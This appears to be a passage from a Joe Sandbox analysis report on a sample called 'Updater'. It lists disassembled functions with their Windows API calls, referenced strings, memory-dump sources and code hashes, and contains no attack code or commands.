Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e6e4a0a755827695bc43ab98d0592c737384509f0d807a0f64955d7acac1dfae
Instruction ID: ced0ebaf1fe5fd48de0a8430154af7b1b7f44493ba94405c093c0a6b6e4344c7
Opcode Fuzzy Hash: e6e4a0a755827695bc43ab98d0592c737384509f0d807a0f64955d7acac1dfae
Instruction Fuzzy Hash: 4221A775604314AFAB509FE8CC89DBA77EDEB09360B148125F905CB262DF78EC41C765

Function 00741330 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00741350
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00741383
GetStdHandle.KERNEL32(0000000C), ref: 00741395
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007413CF
CloseHandle.KERNEL32(?), ref: 007413F3

Strings

nul, xrefs: 007413CA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Handle$Create$CloseFilePipe
String ID: nul
API String ID: 3408351469-2873401336
Opcode ID: 99447bc4b0a5da911c27c3356906e7e439e5f99b9c454b9a986249f7b15067b1
Instruction ID: 8cb0c13de674325beafd0a59d1a9dc03bac2065f7b404a56b1790e168fa80180
Opcode Fuzzy Hash: 99447bc4b0a5da911c27c3356906e7e439e5f99b9c454b9a986249f7b15067b1
Instruction Fuzzy Hash: F9216070A0030AEFDB30AF69DC05A9A7BE8FF55760F604A19F9A1D72D0E7749890CB50

Function 00741405 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00741424
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00741456
GetStdHandle.KERNEL32(000000F6), ref: 00741467
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007414A1
CloseHandle.KERNEL32(?), ref: 007414C5

Strings

nul, xrefs: 0074149C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Handle$Create$CloseFilePipe
String ID: nul
API String ID: 3408351469-2873401336
Opcode ID: bf05ac8441136ff32ae841377faaeb41916cb75a03a957922824912d55461b78
Instruction ID: 1de7dbc3ee9aafb4cacecfbfcfe34b0c400122ad5da8211716ae4f3461fc093d
Opcode Fuzzy Hash: bf05ac8441136ff32ae841377faaeb41916cb75a03a957922824912d55461b78
Instruction Fuzzy Hash: 0421817560034A9FDB30AFADDC04A99B7E8BF55760F604B19F9A1E32D0D7B89890CB50

Function 00764A66 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E4570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
Part of subcall function 006E4570: GetStockObject.GDI32(00000011), ref: 006E45C2
Part of subcall function 006E4570: SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00764ACB
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00764AD8
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00764AE3
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00764AF2
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00764AFE

Strings

Msctls_Progress32, xrefs: 00764A9C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ae7c25d3ebdfe766e3b3536c2b25680edc9885648804bda214e95b4ed146016e
Instruction ID: 931443d5cef22dc893bff1c498b6696528663b651537dc56e825784f5867816a
Opcode Fuzzy Hash: ae7c25d3ebdfe766e3b3536c2b25680edc9885648804bda214e95b4ed146016e
Instruction Fuzzy Hash: 201186B1250219BEEF115F64DC85EE77FADEF09798F018111BA48A7090C675DC21DBA4

Function 0070D60F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0070D5D3: _free.LIBCMT ref: 0070D5FC

_free.LIBCMT ref: 0070D65D

Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A

_free.LIBCMT ref: 0070D668
_free.LIBCMT ref: 0070D673
_free.LIBCMT ref: 0070D6C7
_free.LIBCMT ref: 0070D6D2
_free.LIBCMT ref: 0070D6DD
_free.LIBCMT ref: 0070D6E8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: acd2ea49cf299b89b64f17ab4c84d32e9c7a8468b9dcd93b7b969ff5bf17de5c
Instruction ID: 6d5bb6321aed56549f76326f9c237d8aae6cda14fde6371c223a9bb0a44b9d7a
Opcode Fuzzy Hash: acd2ea49cf299b89b64f17ab4c84d32e9c7a8468b9dcd93b7b969ff5bf17de5c
Instruction Fuzzy Hash: CC114C72540B04EAEA30BBB0CC5FFCB77DCAF00704F400A15B7A9A60D3DE69B9159661

Function 014A705D Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 014A6EC5: VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
Part of subcall function 014A6EC5: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
Part of subcall function 014A6EC5: GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
Part of subcall function 014A6EC5: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4

CharToOemA.USER32(?,?), ref: 014A7094
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 014A70B1
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70B7
GetStdHandle.KERNEL32(000000F4,014A7121,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70CC
WriteFile.KERNEL32(00000000,000000F4,014A7121,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 014A70D2
LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 014A70F4
MessageBoxA.USER32(00000000,?,?,00002010), ref: 014A710A

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 2c00040a03add7d63feb164a6b7650cd9dfedee44a0f1c8c7e23f53f15a82750
Instruction ID: 7e0d31d4969a769cf1b10f897b6fbfcd66d2f0acbab630ccdaae77f53070bb2d
Opcode Fuzzy Hash: 2c00040a03add7d63feb164a6b7650cd9dfedee44a0f1c8c7e23f53f15a82750
Instruction Fuzzy Hash: 9C1151B5108206AAD710F7A5CC85F9B77EC9B74700F814A2FB354D60F0DA75D9049762

Function 0073E854 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0073E86E
LoadStringW.USER32(00000000), ref: 0073E875
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0073E88B
LoadStringW.USER32(00000000), ref: 0073E892
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073E8D6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0073E8B3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: f4a78c2ba7e6a63f0c685abd309cc218383f2edaef8aa4b815b174d5768beb30
Instruction ID: 347bae392f28d917b5a3d594fb077d6b3978b08cad6a6121097be5ea4a4b6b45
Opcode Fuzzy Hash: f4a78c2ba7e6a63f0c685abd309cc218383f2edaef8aa4b815b174d5768beb30
Instruction Fuzzy Hash: E301FFF6E103097FE720A794DD89EE7776CE708301F4045A5FB4AE2052EAB85E844B75

Function 006E45EE Relevance: 9.3, APIs: 6, Instructions: 277COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 006E4614
GetWindowRect.USER32(?,?), ref: 006E4655
ScreenToClient.USER32(?,?), ref: 006E467D
GetClientRect.USER32(?,?), ref: 006E47BD
GetWindowRect.USER32(?,?), ref: 006E47DE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: f09d24fb9f34cf8b04eff53eb0d6476a1e0077b4367123acd796b32bea42c33f
Instruction ID: fc8e2cb3d00381ae7f6d110ecb0445b4c0e5c9250c0f3d41ccc4d36a51c227ce
Opcode Fuzzy Hash: f09d24fb9f34cf8b04eff53eb0d6476a1e0077b4367123acd796b32bea42c33f
Instruction Fuzzy Hash: 0DB16838A1138ADBDB14CFB9C4407EAB7F2FF58310F14851AE8A9D3250DB34A951DB95

Function 007528EC Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00753C99: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00751BEC,00000000,?,?,00000000), ref: 00753CE5

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0075299C
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007529BD
WSAGetLastError.WSOCK32 ref: 007529CE
inet_ntoa.WSOCK32(?), ref: 00752A68
htons.WSOCK32(?), ref: 00752AB7
_strlen.LIBCMT ref: 00752B11

Part of subcall function 00734A80: _strlen.LIBCMT ref: 00734A8A

Part of subcall function 006EF3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,00008000,?,00000000,00000000,00000000,?,00008000,00008000,?,0073D9C7,00008000,?,?), ref: 006EF402
Part of subcall function 006EF3E6: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,?,00008000,00008000,?,0073D9C7,00008000,?,?), ref: 006EF435

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
String ID:
API String ID: 1923757996-0
Opcode ID: 27f0b601749d2a63fa8d1639cb74985aebb289f04deea109c9b193df2b9c08f3
Instruction ID: 1be751234b7f0ceefbcbecdad64830ffde1df7f307bcb29726d041b442ecb10d
Opcode Fuzzy Hash: 27f0b601749d2a63fa8d1639cb74985aebb289f04deea109c9b193df2b9c08f3
Instruction Fuzzy Hash: 10A12170604340AFC324DF24C895E6A7BA6AF85304F14894CF8565B3A3DBB5ED4ACB92

Function 0070602C Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006F8204,006F8204,?,?,?,0070627D,00000001,00000001,71E85006), ref: 00706086
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0070627D,00000001,00000001,71E85006,?,?,?), ref: 0070610C
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,71E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00706206
__freea.LIBCMT ref: 00706213

Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860

__freea.LIBCMT ref: 0070621C
__freea.LIBCMT ref: 00706241

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cf363579b58afa1f25726377e2ecbb1d0cae7d089bc30cc6fab2518f706ec3e2
Instruction ID: efe785c69dd41aa06e3da05cf157643f2e3c5810facfe49cfe3e8e34503050cd
Opcode Fuzzy Hash: cf363579b58afa1f25726377e2ecbb1d0cae7d089bc30cc6fab2518f706ec3e2
Instruction Fuzzy Hash: 0251C272A4021AEBDB258F64CCA5EBB77E9EB54750F154329FD04DA2C0EB38DCA08650

Function 00730851 Relevance: 9.2, APIs: 6, Instructions: 205memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00755FF9), ref: 0073085D
SysAllocString.OLEAUT32(00000001), ref: 00730904
VariantCopy.OLEAUT32(00730B20), ref: 0073092D
VariantClear.OLEAUT32(00730B20), ref: 00730951
VariantCopy.OLEAUT32(00730B20,00000000), ref: 00730955
VariantClear.OLEAUT32(00755FE5), ref: 0073095F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 3ed2b8d29a237bc4c3cc935667ae9792319647cdc5a7c470060461e4d9e8f542
Instruction ID: 8f4f9842ce1beb9d5f147e5d215698b462ef76a06534de2eb39801b6b4f19b4f
Opcode Fuzzy Hash: 3ed2b8d29a237bc4c3cc935667ae9792319647cdc5a7c470060461e4d9e8f542
Instruction Fuzzy Hash: 9651A031A10304DBFF64AF64E4A9739B3A5AF45710F20D45AE80ACF297EA789C40CBD5

Function 0075C5DB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C6CA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C725
RegCloseKey.ADVAPI32(00000000), ref: 0075C76A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0075C799
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075C7F3
RegCloseKey.ADVAPI32(?), ref: 0075C7FF

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_wcslen
String ID:
API String ID: 2678008712-0
Opcode ID: f8cbb276b71e687838177823a6b6d42daf01e0d51764eec9a54d03f51136c197
Instruction ID: 7f031da5d239eca4bcdd0aa9b0a2df4979ba675111e9bf32430011b0018b42b4
Opcode Fuzzy Hash: f8cbb276b71e687838177823a6b6d42daf01e0d51764eec9a54d03f51136c197
Instruction Fuzzy Hash: C9819F30618341AFD715DF24C884E6AB7E5FF88308F14885DF8564B2A2DB75ED09CB91

Function 00768BA7 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(007A2890,00000000,007A2890,00000000,00000000,007A2890,?,00728EBD,00000000,?,00000000,?,?,00728E87,00000004,00000000), ref: 00768C1B
EnableWindow.USER32(00000000,00000000), ref: 00768C3F
ShowWindow.USER32(007A2890,00000000), ref: 00768C9F
ShowWindow.USER32(00000000,00000004), ref: 00768CB1
EnableWindow.USER32(00000000,00000001), ref: 00768CD5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00768CF8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 24d93f0d6ed982c16ce354ecd2a9817434d0bd6f992f3acd75e22cab73891880
Instruction ID: e046c603c23d351e66b4b3e8b88337d6fae5cb6f8ee3b08ea365cf5bcac786de
Opcode Fuzzy Hash: 24d93f0d6ed982c16ce354ecd2a9817434d0bd6f992f3acd75e22cab73891880
Instruction Fuzzy Hash: 76417430601244EFDB65CF14C499B957BE1FB05314F1842E9ED5A8F2A2CB75A845CB72

Function 0074706A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 357comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007470B5
CoInitialize.OLE32(00000000), ref: 00747219
CoCreateInstance.OLE32(00770CAC,00000000,00000001,00770B1C,?), ref: 00747232
CoUninitialize.OLE32 ref: 007474D6

Strings

.lnk, xrefs: 00747093, 007470F9, 007471BC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 01745d5e91dd5a1da2c50056018d866c19004baf337d31460c04ff1fbfbaffdb
Instruction ID: af56869219767ad239ed39010f39e23de2528f0756db4ec827e9dd9738d728bd
Opcode Fuzzy Hash: 01745d5e91dd5a1da2c50056018d866c19004baf337d31460c04ff1fbfbaffdb
Instruction Fuzzy Hash: B8D18971608301AFD304DF14C891E6BBBE9FF94704F04892EF5858B2A1DB71E94ACB92

Function 0074164F Relevance: 9.1, APIs: 6, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00741666
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0074169D
EnterCriticalSection.KERNEL32(?), ref: 007416B9
LeaveCriticalSection.KERNEL32(?), ref: 00741733
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00741748
InterlockedExchange.KERNEL32(?,000001F6), ref: 00741767

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 99d4eba6e4c260a7671cb3892379cd027919e5d392ba9d7167835c3d8cdcbf8a
Instruction ID: dee5e0a528b338f47fac14acae80470620fabdd07fb6ba24815d9d22f761210e
Opcode Fuzzy Hash: 99d4eba6e4c260a7671cb3892379cd027919e5d392ba9d7167835c3d8cdcbf8a
Instruction Fuzzy Hash: A031C531A00205EFDF00EF54CC85A6EB779FF45710B1580A9FA05AB246DB74DE11CBA4

Function 0076864E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B

GetWindowLongW.USER32(01430D50,000000F0), ref: 00768695
SetWindowLongW.USER32(00000000,000000F0,?), ref: 007686BA
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007686D2
GetSystemMetrics.USER32(00000004), ref: 007686FF
GetSystemMetrics.USER32(00000004), ref: 0076870A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0074C28E,00000000), ref: 0076871F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 360ca209d3b42bc242c0b9dd05b266dfaf89d51efe88c6d7d5ea599a2079798b
Instruction ID: dfb1b6a49de4c49e9409154aa418b36f19de6c38c37fe1af8c5fbcae9fbe4004
Opcode Fuzzy Hash: 360ca209d3b42bc242c0b9dd05b266dfaf89d51efe88c6d7d5ea599a2079798b
Instruction Fuzzy Hash: BB21D331620341EFCB648F78CC08A6A37A4EB45364F248729FC23C22E1DE789C50DB16

Function 007463E8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328comCOMMON

Download Yara Rule

APIs

Part of subcall function 006D119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D1192,?), ref: 006D11BF

_wcslen.LIBCMT ref: 00746441
CoInitialize.OLE32(00000000), ref: 00746561
CoCreateInstance.OLE32(00770CAC,00000000,00000001,00770B1C,?), ref: 0074657A
CoUninitialize.OLE32 ref: 0074659B

Strings

.lnk, xrefs: 00746438, 00746485, 00746551
